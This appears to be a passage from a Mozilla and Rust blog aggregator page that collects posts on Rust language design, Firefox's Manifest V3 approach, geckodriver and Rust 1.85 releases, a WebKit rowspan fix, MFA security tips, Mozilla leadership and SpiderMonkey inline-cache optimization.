Yes! I think abstract fields would also be useful in two other ways (though we have to stretch their definition a bit). I believe it’s important for Rust to grow stronger integration with theorem provers; I don’t expect these to be widely used, but for certain key libraries (stdlib, zerocopy, maybe even tokio) it’d be great to be able to mathematically prove type safety. But mathematical proof systems often require a notion of ghost fields — basically logical state that doesn’t really exist at runtime but which you can talk about in a proof. A ghost field is essentially an abstract field that is mapped to an empty set of fields and which has a type. For example you might declare a BeanCounter struct with two abstract fields (a, b) and one real field that stores their sum:

struct BeanCounter {
    pub abstract a: u32,
    pub abstract b: u32,
    sum: u32, // <— at runtime, we only store the sum
}

then when you create BeanCounter you would specify a value for those fields. The value would perhaps be written using something like an abstract block, indicating that in fact the code within will not be executed (but must still be type checkable):

impl BeanCounter {
    pub fn new(a: u32, b: u32) -> Self {
        Self { a: abstract { a }, b: abstract { b }, sum: a + b }
    }
}

Providing abstract values is useful because it lets the theorem prover act “as if” the code was there for the purpose of checking pre- and post-conditions and other kinds of contracts.

Could we use abstract fields to replace phantom data?

Yes! I imagine that instead of a: PhantomData<T> you could do abstract a: T, but that would mean we’d have to have some abstract initializer. So perhaps we permit an anonymous field abstract _: T, in which case you wouldn’t be required to provide an initializer, but you also couldn’t name it in contracts.

So what are all the parts to an abstract field?

I would start with just the simplest form of abstract fields, which is an alias for a set of real fields. But to extend to cover ghost fields or PhantomData, you want to support the ability to declare a type for abstract fields (we could say that the default if ()). For fields with non-() types, you would be expected to provide an abstract value in the struct constructor. To conveniently handle PhantomData, we could add anonymous abstract fields where no type is needed.

Should we permit view types on other types?

I’ve shown view types attached to structs and tuples. Conceivably we could permit them elsewhere, e.g., {0} &(String, String) might be equivalent to &{0} (String, String). I don’t think that’s needed for now and I’d make it ill-formed, but it could be reasonable to support at some point.

Conclusion

This concludes my exploration through view types. The post actually changed as I wrote it — initially I expected to include place-based borrows, but it turns out we didn’t really need those. I also initially expected view types to be a special case of struct types, and that indeed might simplify things, but I wound up concluding that they are a useful type constructor on their own. In particular if we want to integrate them into traits it will be necessary for them to be applied to generics and the rest.≈g

In terms of next steps, I’m not sure, I want to think about this idea, but I do feel we need to address this gap in Rust, and so far view types seem like the most natural. I think what could be interesting is to prototype them in a-mir-formality as it evolves to see if there are other surprises that arise.


  1. I’m not really proposing this syntax—among other things, it is ambiguous in expression position. I’m not sure what the best syntax is, though! It’s an important question, but not one I will think hard about here. ↩︎

  2. I prefer the name ghost fields, because it’s spooky, but abstract is already a reserved keyword. ↩︎

The Mozilla BlogMozilla’s approach to Manifest V3: What’s different and why it matters for extension users

Extensions are like apps for your browser, letting you customize and enhance your online experience. Nearly half of all Firefox users have installed at least one extension, from privacy tools to productivity boosters.

To build these extensions, developers rely on a platform called WebExtensions, which provides APIs — the tools that allow extensions to interact with web pages and browser features. Right now, all major browsers — including Firefox, Chrome and Safari — are implementing the latest version of this platform, Manifest V3. But different browsers are taking different approaches, and those differences affect which extensions you can use.

Firefox’s approach to Manifest V3 is shaped by our mission

Principle 5 of the Mozilla Manifesto states: Individuals must have the ability to shape the internet and their own experiences on it. That philosophy drives our approach to Manifest V3.

  • More creative possibilities for developers — We’ve introduced a broader range of APIs, including new AI functionality that allows extensions to run offline machine learning tasks directly in the browser.
  • Support for both Manifest V2 and V3 — While some browsers are phasing out Manifest V2 entirely, Firefox is keeping it alongside Manifest V3. More tools for developers means more choice and innovation for users.

Giving people choice and control on the internet has always been core to Mozilla. It’s all about making sure users have the freedom to shape their own experiences online.

No limits on your extensions with Firefox

Google began phasing out Manifest V2 last year and plans to end support for extensions built on it by mid-2025. That change has real consequences: Chrome users are already losing access to uBlock Origin, one of the most popular ad blockers, because it relies on a Manifest V2 feature called blockingWebRequest.

Google’s approach replaces blockingWebRequest with declarativeNetRequest, which limits how extensions can filter content. Since APIs define what extensions can and can’t do inside a browser, restricting certain APIs can limit what types of extensions are possible.

Firefox, however, will continue supporting both blockingWebRequest and declarativeNetRequest — giving developers more flexibility and keeping powerful privacy tools available to users. We’ll keep you updated on what’s next for extensions in Firefox. In the meantime, check out addons.mozilla.org to explore thousands of ways to customize your Firefox.

The post Mozilla’s approach to Manifest V3: What’s different and why it matters for extension users appeared first on The Mozilla Blog.

Firefox Developer ExperienceGeckodriver 0.36.0 Released

We are proud to announce the next major release of geckodriver 0.36.0. It ships with some new features and fixes to improve your WebDriver experience.

Contributions

With geckodriver being an open source project, we are grateful to get contributions from people outside of Mozilla:

  • Gatlin Newhouse added support for searching the Firefox Developer Edition’s default path on macOS.

Geckodriver code is written in Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for geckodriver.

Added

  • Support for searching the Firefox Developer Edition’s default path on macOS. Implemented by Gatlin Newhouse.
  • Ability to push a WebExtension archive as created from a base64 encoded string to an Android device.
  • Added an allowPrivateBrowsing field for POST /session/{session id}/moz/addon/install to allow the installation of a WebExtension that is enabled in Private Browsing mode.
  • Introduced the --allow-system-access command line argument for geckodriver, which will be required for future versions of Firefox (potentially starting with 138.0) to allow testing in the chrome context.
  • Added support for preserving crash dumps for crash report analysis when Firefox crashes. If the MINIDUMP_SAVE_PATH environment variable is set to an existing folder, crash dumps will be saved accordingly. For mobile devices, the generated minidump files will be automatically transferred to the host machine. For more details see the documentation of how to handle crash reports.

Changed

  • Updated the type of the x and y fields of pointer move actions (mouse and touch) from integer to fractional numbers to ensure a more precise input control.
  • Replaced serde_yaml with yaml-rust because it’s no longer officially supported.
  • The --enable-crash-reporter command line argument has been deprecated to prevent crash reports from being submitted to Socorro. This argument will be completely removed in the next version. Instead, use the MINIDUMP_SAVE_PATH environment variable to get minidump files saved to a specified location.

Fixed

  • Fixed route registration for WebAuthn commands, which were introduced in geckodriver 0.34.0 but mistakenly registered under /sessions/ instead of /session/, causing them to be non-functional.

Removed

  • Removed the -no-remote command-line argument usage for Firefox, which does no longer exist.

Downloads

Geckodriver 0.36.0 can be downloaded for all supported platforms as usual from our GitHub release page.

Mozilla Open Policy & Advocacy BlogMozilla Joins Amicus Brief in Support of Law That Protects Your Private Messages

Today Mozilla has joined an amicus brief in the California Supreme Court defending statutory privacy protections for messages on services such as Snapchat or Facebook. The amicus brief asks the court to overrule a lower court opinion that would significantly reduce the legal privacy protections for users of these widely used services. Mozilla is joined on the brief by the Electronic Frontier Foundation and the Center for Democracy and Technology.

Back in 1986, Congress passed a law called the Stored Communications Act (SCA) to provide privacy protections for stored electronic communications such as email. The SCA prohibits service providers from sharing private messages with the government or other third-parties without authorization. For example, it requires that the government must get a warrant to access recent communications (or at least a subpoena in other circumstances). In the years since 1986, it is fair to say we have developed many new forms of digital communication. Fortunately, the language of the SCA is sufficiently general (it uses the term “electronic communication service”) that courts have applied it to a large array of new products.

Unfortunately, a California court recently narrowed the scope of the SCA. In the case of Snap v. The Superior Court of San Diego County, the California Court of Appeal ruled that the SCA does not protect users of Snapchat and Facebook. The court concluded that the SCA does not apply because, in addition to facilitating transmission of messages and storing backups, these companies also maintain that content for their own business purposes such as targeted advertising. If upheld, this ruling would remove the SCA’s protection not just for users of Snap and Facebook, but for many other modern forms of communication.

While we may criticize some of Snap or Meta’s data practices, it would only compound the privacy harm to their users to hold that their privacy policies take them outside the scope of the SCA, with potential ramifications for the users of other services in the future. Our brief argues that this is both wrong on the law and bad policy. We hope the California Supreme Court will fix the lower court’s error and restore key statutory privacy protections to modern messaging services.

The post Mozilla Joins Amicus Brief in Support of Law That Protects Your Private Messages appeared first on Open Policy & Advocacy.

Tantek ÇelikCSF_01: Three Steps for IndieWeb Cybersecurity

Welcome to my first Cybersecurity Friday (CSF) post. Almost exactly one week ago I experienced (and had to fight & recover from) a cybersecurity incident. While that’s a much longer story, this post series is focused on sharing tips and incident learnings from an #indieweb-centric perspective.

Steps for Cybersecurity

Here are the top three steps in order of importance, that you should take ASAP to secure your online presence.

  1. Email MFA/2FA. Add multi-factor authentication (MFA) using an actual Authenticator application to all places where you store or check email. Some services call this second factor or two factor authentication (2FA). While checking your email security settings, verify recovery settings: Do not cross-link your emails as recovery methods for each other, and do not use a mobile/cell number for recovery at all.
  2. Domain Registrar MFA. Add MFA to your Domain Registrar(s) if you have any. Optionally disable password reset emails if possible (some registrars may allow this).
  3. Web Host MFA. Add MFA to your web hosting service(s) if you have any. This includes both website hosting and any content delivery network (CDN) services you are using for your domains.

Do not use a mobile number for MFA, nor a physical/hardware key if you travel internationally. There are very good reasons to avoid doing so. I’ll blog the reasons in another post.

Those are my top three recommended cybersecurity steps for protecting your internet presence. That’s it for this week. These are the bare minimum steps to take. There are many more steps you can take to strengthen your personal cybersecurity. I will leave you with this for now:

Entropy is your friend in security.

Glossary

Glossary for various terms, phrases, and further reading on each.

content delivery network
https://indieweb.org/content_delivery_network
cybersecurity
https://en.wikipedia.org/wiki/cybersecurity
domain registrar
https://indieweb.org/domain_registrar
email recovery
A method for recovering a service account password via the email account associated with that account. See also: https://en.wikipedia.org/wiki/Password_notification_email
entropy
https://en.wikipedia.org/wiki/Entropy_(information_theory)
MFA / 2FA
https://indieweb.org/multi-factor_authentication sometimes called Two Factor Authentication or Second Factor Authentication
mobile number for MFA
https://indieweb.org/SMS#Criticism
web host
https://indieweb.org/web_hosting

Syndicated to: IndieNews

Karl DubostFixing rowspan=0 on tables on WebKit.

stacked tables and chairs in the street.

Last week, I mentioned there were easy ways to fix or help the WebKit project.

Find The Bug

In January, looking at the FIXME: mentions on the WebKit project, I found this piece of code:

unsigned HTMLTableCellElement::rowSpan() const
{
    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
    return std::max(1u, rowSpanForBindings());
}

Searching on bugs.webkit.org, I found this bug opened by Simon Fraser on May 5, 2018: rowspan="0" results in different table layout than Firefox/Chrome. Would I be able to solve it?

Test The Bug

The first task is very simple. Understand what are the different renderings in between browsers.

Simon had already created a testcase and Ahmad had created a screenshot for it showing the results of the testcase in Safari, Firefox and Chrome. This work was already done. If they had been missing, that would have been my first step.

Read The Specification

For having a better understanding of the issue, it is useful to read the specification related to this bug. In this case, the relevant information was in the HTML specification, where rowspan attribute on td/th elements is described. This is the text we need:

The td and th elements may also have a rowspan content attribute specified, whose value must be a valid non-negative integer less than or equal to 65534. For this attribute, the value zero means that the cell is to span all the remaining rows in the row group.

Create More Tests

Let's take a normal simple table which is 3 by 3.

<table border="1">
  <tr><td>A1</td><td>B1</td><td>C1</td></tr>
  <tr><td>A2</td><td>B2</td><td>C2</td></tr>
  <tr><td>A3</td><td>B3</td><td>C3</td></tr>
</table>

We might want to make the first cell overlapping the 3 rows of the tables. A way to do that is to set rowspan="3" because there are 3 rows.

<table border="1">
  <tr><td rowspand="3">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                        <td>B2</td><td>C2</td></tr>
  <tr>                        <td>B3</td><td>C3</td></tr>
</table>

This will create a table were the first column will overlap the 3 rows. This is already working as expected in all rendering engines : WebKit, Gecko and Blink. So far, so good.

Think About The Logic

I learned from reading the specification that rowspan had a maximum value: 65534.

My initial train of thoughts was:

  1. compute the number of rows the table.
  2. parse the value rowspan value
  3. when the value is 0, replace it with the number of rows.

It seemed too convoluted. Would it be possible to use the maximum value for rowspan? The specification was saying "span all the remaining rows in the row group".

I experimented with a bigger rowspan value than the number of rows. For example, put the value 30 on a 3 rows table.

<table border="1">
  <tr><td rowspand="30">A1</td><td>B1</td><td>C1</td></tr>
  <tr>                         <td>B2</td><td>C2</td></tr>
  <tr>                         <td>B3</td><td>C3</td></tr>
</table>

I checked in Firefox, Chrome, and Safari. I got the same rendering. We were on the right track. Let's use the maximum value for rowspan.

I made a test case with additional examples to be able to check in different browsers the behavior:

Rendering of the table bug in Safari.

Fixing The Code

We just had to try to change the C++ code. My patch was

diff --git a/Source/WebCore/html/HTMLTableCellElement.cpp b/Source/WebCore/html/HTMLTableCellElement.cpp
index 256c816acc37b..65450c01e369a 100644
--- a/Source/WebCore/html/HTMLTableCellElement.cpp
+++ b/Source/WebCore/html/HTMLTableCellElement.cpp
@@ -59,8 +59,14 @@ unsigned HTMLTableCellElement::colSpan() const

 unsigned HTMLTableCellElement::rowSpan() const
 {
-    // FIXME: a rowSpan equal to 0 should be allowed, and mean that the cell is to span all the remaining rows in the row group.
-    return std::max(1u, rowSpanForBindings());
+    unsigned rowSpanValue = rowSpanForBindings();
+    // when rowspan=0, the HTML spec says it should apply to the full remaining rows.
+    // In https://html.spec.whatwg.org/multipage/tables.html#attr-tdth-rowspan
+    // > For this attribute, the value zero means that the cell is
+    // > to span all the remaining rows in the row group.
+    if (!rowSpanValue)
+        return maxRowspan;
+    return std::max(1u, rowSpanValue);
 }

 unsigned HTMLTableCellElement::rowSpanForBindings() const

If rowspan was 0, just give the maximum value which is defined in HTMLTableCellElement.h.

I compiled the code change and verified the results:

Rendering of the table bug in Safari but this time fixed.

(note for the careful reader the last table legend is wrong, it should be rowspan="3")

This was fixed! A couple of tests needed to be rebaselined. I was ready to send a Pull Request for this bug.

What Is Next?

The fix is not yet available on the current version of Safari, but you can experiment it with Safari Technology Preview (STP 213 Release Notes).

The biggest part of fixing the bugs is researching, testing different HTML scenario without even touching the C++ code, etc. I'm not a C++ programmer, but time to time I can find bugs that are easy enough to understand that I can fix them. I hope this makes it easier for you to understand and encourage you to look at other bugs.

Note also, that it is not always necessary to fix until modifying everything. Sometimes, just creating testscases, screenshots, pointing to the right places in the specifications, creating the WPT test cases covering this bug are all super useful.

PS: Doing all this work, I found also about the behavior of colspan which is interoperable (same behavior in all browsers), but which I find illogical comparing to the behavior of rowspan.

Otsukare!

Niko MatsakisRust 2024 Is Coming

So, a little bird told me that Rust 2024 is going to become stable today, along with Rust 1.85.0. In honor of this momentous event, I have penned a little ditty that I’d like to share with you all. Unfortunately, for those of you who remember Rust 2021’s “Edition: The song”, in the 3 years between Rust 2021 and now, my daughter has realized that her father is deeply uncool1 and so I had to take this one on solo2. Anyway, enjoy! Or, you know, suffer. As the case may be.

Video

Watch the movie embedded here, or watch it on YouTube:

Lyrics

In ChordPro format, for those of you who are inspired to play along.

{title: Rust 2024}
{subtitle: }

{key: C}

[Verse 1]
[C] When I got functions that never return
I write an exclamation point [G]
But use it for an error that could never be
the compiler [C] will yell at me

[Verse 2]
[C] We Rust designers, we want that too
[C7] But we had to make a [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge]
[Am] ... [Am] But will my program [E] build?
[Am] Yes ... oh that’s [D7] for sure
[F] edi-tions [G] are [C] opt in

[Verse 3]
[C] Usually when I return an `impl Trait`
everything works out fine [G]
but sometimes I need a tick underscore
and I don’t really [C] know what that’s for

[Verse 4]
[C] We Rust designers we do agree
[C7] That was con- [F] fusing 
[F] But that will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Bridge 2]
[Am] Cargo fix will make the changes
automatically [G] Oh that sure sounds great...
[Am] but wait... [Am] my de-pen-denc-[E]-ies
[Am] Don’t worry e-[D7]ditions
[F] inter [G] oper [C] ate

[Verse 5]
[C] Whenever I match on an ampersand T
The borrow [G] propagates
But where do I put the ampersand
when I want to [C] copy again?

[Verse 6]
[C] We Rust designers, we do agree
[C7] That really had to [F] change
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

[Outro]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

One more time!

[Half speed]
[F] That will be [Fm]better
[C] Oh so much [A]better
[D] in Rust Twenty [G7]Twenty [C]Four

  1. It was bound to happen eventually. ↩︎

  2. Actually, I had a plan to make this a duet with somebody who shall remain nameless (they know who they are). But I was too lame to get everything done on time. In fact, I may or may not have realized “Oh, shit, I need to finish this recording!” while in the midst of a beer with Florian Gilcher last night. Anyway, sorry, would-be-collaborator-I -was-really-looking-forward-to-playing-with! Next time! ↩︎

The Rust Programming Language BlogAnnouncing Rust 1.85.0 and Rust 2024

The Rust team is happy to announce a new version of Rust, 1.85.0. This stabilizes the 2024 edition as well. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.85.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.85.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.85.0 stable

Rust 2024

We are excited to announce that the Rust 2024 Edition is now stable! Editions are a mechanism for opt-in changes that may otherwise pose a backwards compatibility risk. See the edition guide for details on how this is achieved, and detailed instructions on how to migrate.

This is the largest edition we have released. The edition guide contains detailed information about each change, but as a summary, here are all the changes:

Migrating to 2024

The guide includes migration instructions for all new features, and in general transitioning an existing project to a new edition. In many cases cargo fix can automate the necessary changes. You may even find that no changes in your code are needed at all for 2024!

Note that automatic fixes via cargo fix are very conservative to avoid ever changing the semantics of your code. In many cases you may wish to keep your code the same and use the new semantics of Rust 2024; for instance, continuing to use the expr macro matcher, and ignoring the conversions of conditionals because you want the new 2024 drop order semantics. The result of cargo fix should not be considered a recommendation, just a conservative conversion that preserves behavior.

Many people came together to create this edition. We'd like to thank them all for their hard work!

async closures

Rust now supports asynchronous closures like async || {} which return futures when called. This works like an async fn which can also capture values from the local environment, just like the difference between regular closures and functions. This also comes with 3 analogous traits in the standard library prelude: AsyncFn, AsyncFnMut, and AsyncFnOnce.

In some cases, you could already approximate this with a regular closure and an asynchronous block, like || async {}. However, the future returned by such an inner block is not able to borrow from the closure captures, but this does work with async closures:

let mut vec: Vec<String> = vec![];

let closure = async || {
    vec.push(ready(String::from("")).await);
};

It also has not been possible to properly express higher-ranked function signatures with the Fn traits returning a Future, but you can write this with the AsyncFn traits:

use core::future::Future;
async fn f<Fut>(_: impl for<'a> Fn(&'a u8) -> Fut)
where
    Fut: Future<Output = ()>,
{ todo!() }

async fn f2(_: impl for<'a> AsyncFn(&'a u8))
{ todo!() }

async fn main() {
    async fn g(_: &u8) { todo!() }
    f(g).await;
    //~^ ERROR mismatched types
    //~| ERROR one type is more general than the other

    f2(g).await; // ok!
}

So async closures provide first-class solutions to both of these problems! See RFC 3668 and the stabilization report for more details.

Hiding trait implementations from diagnostics

The new #[diagnostic::do_not_recommend] attribute is a hint to the compiler to not show the annotated trait implementation as part of a diagnostic message. For library authors, this is a way to keep the compiler from making suggestions that may be unhelpful or misleading. For example:

pub trait Foo {}
pub trait Bar {}

impl<T: Foo> Bar for T {}

struct MyType;

fn main() {
    let _object: &dyn Bar = &MyType;
}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
 --> src/main.rs:9:29
  |
9 |     let _object: &dyn Bar = &MyType;
  |                             ^^^^ the trait `Foo` is not implemented for `MyType`
  |
note: required for `MyType` to implement `Bar`
 --> src/main.rs:4:14
  |
4 | impl<T: Foo> Bar for T {}
  |         ---  ^^^     ^
  |         |
  |         unsatisfied trait bound introduced here
  = note: required for the cast from `&MyType` to `&dyn Bar`

For some APIs, it might make good sense for you to implement Foo, and get Bar indirectly by that blanket implementation. For others, it might be expected that most users should implement Bar directly, so that Foo suggestion is a red herring. In that case, adding the diagnostic hint will change the error message like so:

#[diagnostic::do_not_recommend]
impl<T: Foo> Bar for T {}
error[E0277]: the trait bound `MyType: Bar` is not satisfied
  --> src/main.rs:10:29
   |
10 |     let _object: &dyn Bar = &MyType;
   |                             ^^^^ the trait `Bar` is not implemented for `MyType`
   |
   = note: required for the cast from `&MyType` to `&dyn Bar`

See RFC 2397 for the original motivation, and the current reference for more details.

FromIterator and Extend for tuples

Earlier versions of Rust implemented convenience traits for iterators of (T, U) tuple pairs to behave like Iterator::unzip, with Extend in 1.56 and FromIterator in 1.79. These have now been extended to more tuple lengths, from singleton (T,) through to 12 items long, (T1, T2, .., T11, T12). For example, you can now use collect() to fanout into multiple collections at once:

use std::collections::{LinkedList, VecDeque};
fn main() {
    let (squares, cubes, tesseracts): (Vec<_>, VecDeque<_>, LinkedList<_>) =
        (0i32..10).map(|i| (i * i, i.pow(3), i.pow(4))).collect();
    println!("{squares:?}");
    println!("{cubes:?}");
    println!("{tesseracts:?}");
}
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
[0, 1, 8, 27, 64, 125, 216, 343, 512, 729]
[0, 1, 16, 81, 256, 625, 1296, 2401, 4096, 6561]

Updates to std::env::home_dir()

std::env::home_dir() has been deprecated for years, because it can give surprising results in some Windows configurations if the HOME environment variable is set (which is not the normal configuration on Windows). We had previously avoided changing its behavior, out of concern for compatibility with code depending on this non-standard configuration. Given how long this function has been deprecated, we're now updating its behavior as a bug fix, and a subsequent release will remove the deprecation for this function.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.85.0

Many people came together to create Rust 1.85.0. We couldn't have done it without all of you. Thanks!

The Mozilla BlogGrowing Mozilla — and evolving our leadership

Since 2022, Mozilla has been in an active process evolving what we do – and renewing our leadership. Today we announced several updates on the leadership piece of this ongoing work. 

We’ve recognized that Mozilla faces major headwinds in terms of both financial growth and mission impact. While Firefox remains the core of what we do, we also need to take steps to diversify: investing in privacy-respecting advertising to grow new revenue in the near term; developing trustworthy, open source AI to ensure technical and product relevance in the mid term; and creating online fundraising campaigns that will draw a bigger circle of supporters over the long run. Mozilla’s impact and survival depend on us simultaneously strengthening Firefox AND finding new sources of revenue AND manifesting our mission in fresh ways. That is why we’re working hard on all of these fronts.

We’ve also moved aggressively to attract new leadership and talent to Mozilla. This includes major growth in our Boards, with 40% new Board members since we began our efforts to evolve and grow back in 2022. We’ve also been bringing in new executive talent, including a new MoFo Executive Director and a Managing Partner for Mozilla Ventures. By the end of the year, we hope to have new, permanent CEOs for both MoCo and Mozilla.ai. 

Today we shared two updates as we continue to push forward with this renewal at the leadership level:

1. Mozilla Leadership Council: 

We are creating a Mozilla Leadership Council composed of the top executive from each of Mozilla’s organizations. This includes: Jane Silber (Mozilla.ai), Laura Chambers (Mozilla Corporation), Mohamed Nanabhay (Mozilla Ventures), Nabiha Syed (Mozilla Foundation), Ryan Sipes (MZLA/Thunderbird) and myself. I will act as chair. The purpose of this group is to better coordinate work across our organizations to make sure that Mozilla is more than the sum of its parts. 

2. New Board Chairs: 

Mozilla has built a strong cadre of 16 directors across all of our Boards, bringing an incredible breadth of experience and a commitment to supporting Mozilla in doing the hard and important work ahead. Today we are announcing three new Board chairs: 

  • The new Mozilla Foundation Board Chair is Nicole Wong. Nicole is a respected cross-sector privacy and policy expert and innovator, with leadership roles at Google and Twitter/X, service as Deputy U.S. Chief Technology Officer and positions on multiple corporate and non-profit boards. Nicole has been on Mozilla Foundation’s Board for 8 years. 
  • Kerry Cooper will chair Mozilla Corporation. One of the world’s most respected CMO’s and consumer executives, Kerry has held C-Suite roles at Walmart.com, Rothy’s, Choose Energy and more, and now serves on boards spanning venture, startups and AI innovation. Kerry has been on Mozilla Corporation’s Board for 2 years. 
  • Raffi Krikorian will chair Mozilla.ai. Raffi is a visionary technologist, engineer and leader, who was an early engineering leader at Twitter, headed Uber’s self-driving car lab, and is now CTO at the Emerson Collective where he works at the intersection of emerging technologies and social good. He brings three decades of thoughtful design and implementation within social media and artificial intelligence to Mozilla.

Each of these leaders reflects what I believe will be Mozilla’s ‘secret sauce’ in our next chapter: a mix of experience bridging business, technology and the public interest. Note that these appointments are now reflected on our leadership page

With these changes, Mitchell Baker ends her tenure as Chair and a member of Mozilla Foundation and Mozilla Corporation boards. In co-founding Mozilla, Mitchell built something truly unique and important — a global community and organization that showed how those with vision can shape the world and the future by building technology that puts the needs of humans and humanity first. We are extremely grateful to Mitchell for everything she has done for Mozilla and we are committed to continuing her legacy of fighting for a better future through better technology. I know these feelings are widely shared across Mozilla — we are incredibly appreciative to Mitchell for all that she has done.

As I have said many times over the last few years, Mozilla is entering a new chapter—one where we need to both defend what is good about the web and steer the technology and business models of the AI era in a better direction. I believe that we have the people—indeed, we ARE the people—to do this, and that there are millions around the world ready to help us. I am driven and excited by what lies ahead. 

The post Growing Mozilla — and evolving our leadership appeared first on The Mozilla Blog.

Spidermonkey Development BlogMaking Teleporting Smarter

Recently I got to land a patch which touches a cool optimization, that I had to really make sure I understood deeply. As a result, I wrote a huge commit message. I’d like to expand that message a touch here and turn it into a nice blog post.

This post assumes roughly that you understand how Shapes work in the JavaScript object model, and how prototypical property lookup works in JavaScript. If you don’t understand that just yet, this blog post by Matthias Bynens is a good start.

This patch aims to mitigate a performance cliff that occurs when we have applications which shadow properties on the prototype chain or which mutate the prototype chain.

The problem is that these actions currently break a property lookup optimization called “Shape Teleportation”.

What is Shape Teleporting?

Suppose you’re looking up some property y on an object obj, which has a prototype chain with 4 elements. Suppose y isn’t stored on obj, but instead is stored on some prototype object B, in slot 1.

A diagram of shape teleporting

In order to get the value of this property, officially you have to walk from obj up to B to find the value of y. Of course, this would be inefficient, so what we do instead is attach an inline cache to make this lookup more efficient.

Now we have to guard against future mutation when creating an inline cache. A basic version of a cache for this lookup might look like:

  • Check obj still has the same shape.
  • Check obj‘s prototype (D) still has the same shape.
  • Check D‘s prototype (C) still has the same shape
  • Check C’s prototype (B) still has the same shape.
  • Load slot 1 out of B.

This is less efficient than we would like though. Imagine if instead of having 3 intermediate prototypes, there were 13 or 30? You’d have this long chain of prototype shape checking, which takes a long time!

Ideally, what you’d like is to be able to simply say

  • Check obj still has the same shape.
  • Check B still has the same shape
  • Load slot 1 out of B.

The problem with doing this naively is “What if someone adds y as a property to C? With the faster guards, you’d totally miss that value, and as a result compute the wrong result. We don’t like wrong results.

Shape Teleporting is the existing optimization which says that so long as you actively force a change of shape on objects in the prototype chain when certain modifications occur, then you can guard in inline-caches only on the shape of the receiver object and the shape of the holder object.

By forcing each shape to be changed, inline caches which have baked in assumptions about these objects will no longer succeed, and we’ll take a slow path, potentially attaching a new IC if possible.

We must reshape in the following situations:

  • Adding a property to a prototype which shadows a property further up the prototype chain. In this circumstance, the object getting the new property will naturally reshape to account for the new property, but the old holder needs to be explicitly reshaped at this point, to avoid an inline cache jumping over the newly defined prototype.

A diagram of shape teleporting

  • Modifying the prototype of an object which exists on the prototype chain. For this case we need to invalidate the shape of the object being mutated (natural reshape due to changed prototype), as well as the shapes of all objects on the mutated object’s prototype chain. This is to invalidate all stubs which have teleported over the mutated object.

A diagram of shape teleporting

Furthermore, we must avoid an “A-B-A” problem, where an object returns to a shape prior to prototype modification: for example, even if we re-shape B, what if code deleted and then re-added y, causing B to take on its old shape? Then the IC would start working again, even though the prototype chain may have been mutated!

Prior to this patch, Watchtower watches for prototype mutation and shadowing, and marks the shapes of the prototype objects involved with these operations as InvalidatedTeleporting. This means that property access with the objects involved can never more rely on the shape teleporting optimization. This also avoids the A-B-A problem as new shapes will always carry along the InvalidatedTeleporting flag.

This patch instead chooses to migrate an object shape to dictionary mode, or generate a new dictionary shape if it’s already in dictionary mode. Using dictionary mode shapes works because all dictionary mode shapes are unique and never recycled. This ensures the ICs are no longer valid as expected, as well as handily avoiding the A-B-A problem.

The patch does keep the InvalidatedTeleporting flag to catch potentially ill-behaved sites that do lots of mutation and shadowing, avoiding having to reshape proto objects forever.

The patch also provides a preference to allow cross-comparison between old and new, however this patch defaults to dictionary mode teleportation.

Performance testing on micro-benchmarks shows large impact by allowing ICs to attach where they couldn’t before, however Speedometer3 shows no real movement.

This Week In RustThis Week in Rust 587

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is httpmock, which is quite unsurprisingly a HTTP mocking library for Rust.

Thanks to Jacob Pratt for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

498 pull requests were merged in the last week

Rust Compiler Performance Triage

This week's results were dominated by the update to LLVM 20 (#135763), which brought a large number of performance improvements, as usually. There were also two other significant improvements, caused by improving the representation of const values (#136593) and doing less work when formatting in rustdoc (#136828).

Triage done by @kobzol.

Revision range: c03c38d5..ce36a966

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
4.4% [0.2%, 35.8%] 10
Regressions ❌
(secondary)
1.2% [0.2%, 5.0%] 13
Improvements ✅
(primary)
-1.6% [-10.5%, -0.2%] 256
Improvements ✅
(secondary)
-1.0% [-4.7%, -0.2%] 163
All ❌✅ (primary) -1.3% [-10.5%, 35.8%] 266

